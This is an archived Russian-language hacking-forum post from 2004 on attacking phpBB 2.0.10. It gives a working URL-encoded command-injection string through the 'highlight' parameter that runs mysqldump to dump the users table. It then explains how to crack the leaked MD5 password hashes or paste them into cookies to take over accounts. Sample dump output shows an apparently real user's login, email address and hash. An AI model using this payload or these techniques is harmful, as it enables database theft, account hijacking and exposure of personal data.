ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу phpbb 2.0.10 тех вопрос
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 30.11.2004, 09:59
X-Seven
Новичок
Регистрация: 07.11.2004
Сообщений: 4
Провел на форуме:
0

Репутация: 0
По умолчанию
Насчёт дампа базы.
Mysql-база дампится запросами вида:
mysqldump -u -p dbname > file
После -u должнен идти dbuser,например -uadmin,
после -p dbpasswd,например -ppass,
с dbname,надеюсь,всё ясно.Но т.к. целиком база не нужна,
то нужно ещё указать конкретную её часть,а именно,phpbb_users.
(примечание:название может быть другое,например forum_users,как
узнать префикс,читай выше).
Вместо > лучше писать %3E
file-имя файла,куда должна сдампиться база(теоритически).У меня
phpbb_users просто вывелось на страницу.
ВНИМАНИЕ:В запросе важно указать ПОЛНЫЙ ПУТЬ К МУСКУЛЮ,а точнее,
к файлу mysqldump(путь надо предварительно разведать командами
типа ls или cd).Например,пути могут быть такими:
/usr/local/mysql/bin/mysqldump
/usr/local/bin/mysqldump
/usr/bin/mysqldump

Пример:
Если dbuser=root,dbpasswd=qwerty,dbname=baza,prefix=php bb_,
mysqldump лежит в /usr/bin/,запрос будет таким:

p=123&highlight=%2527.$poster=%60/usr/bin/mysqldump%09-uroot%09-pqwerty%09baza%09phpbb_users%09%3E%09file.sql%60.% 2527


Примечание:вместо всех пробелов надо писать %09,если темы P=123 не
существует,то надо изменить номер,например,на p=321,при копировании
строки запроса в браузер,могут появиться пробелы из-за переноса строки,
их надо удалить.

Если всё прошло удачно,то появится что-то типо этого:
- MySQL dump 8.23 -- -- Host: localhost Database: baze --------------------------------------------------------- -- Server version 3.23.58 -- -- Table structure for table `forum_users`.....

Интерес представляют хэши паролей:
INSERT INTO forum_users VALUES (14,1,'Зелёная','fae0b27c451c728867a567e8c1 bb4e53',1097589801,0,1097589801,1097589772,0,0,0.0 0,1,'russian','D M d, Y g:i a',0,0,0,NULL,1,1,0,1,1,1,1,1,0,1,1,0,'',0,'opa_ho pa@mail.ru','','','Иркутск','','','','','', '','','',NULL);
В данном случае Зелёная-логин,opa_hopa@mail.ru-мыло,на которое логин регился,
fae0b27c451c728867a567e8c1bb4e53 -MD5-хэш,что бы его сломать,надо юзать прогу
MD5Inside.
Примечание:хэш можно подставить в куки вместо своего.

Enjoy!
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ